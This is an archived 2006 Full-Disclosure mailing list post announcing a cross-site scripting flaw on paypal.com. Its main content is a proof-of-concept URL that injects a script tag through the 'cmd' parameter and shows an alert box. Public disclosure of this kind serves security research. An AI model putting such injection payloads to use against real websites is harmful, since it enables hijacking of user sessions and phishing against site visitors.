[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] news XSS on paypal.com

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] news XSS on paypal.com
From: "Pigrelax" <Pigrelax@xxxxxxxxx>
Date: Sun, 23 Jul 2006 15:08:09 +0400 (MSD)

Hi!
>From Russia Security Site:
http://www.securitylab.ru/news/270837.php

New worked XSS on paypal.com:
www.paypal.com/cgi-bin/webscr?cmd=p/gen/--></script><script>alert('www.securitylab.ru')</script>

really work :)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] news XSS on paypal.com
  - From: ad@xxxxxxxxxxxxxxxx

Prev by Date: [Full-disclosure] [SECURITY] [DSA 1120-1] New Mozilla Firefox packages fix several vulnerabilities
Next by Date: Re: [Full-disclosure] news XSS on paypal.com
Previous by thread: [Full-disclosure] [SECURITY] [DSA 1120-1] New Mozilla Firefox packages fix several vulnerabilities
Next by thread: Re: [Full-disclosure] news XSS on paypal.com
Index(es):
- Date
- Thread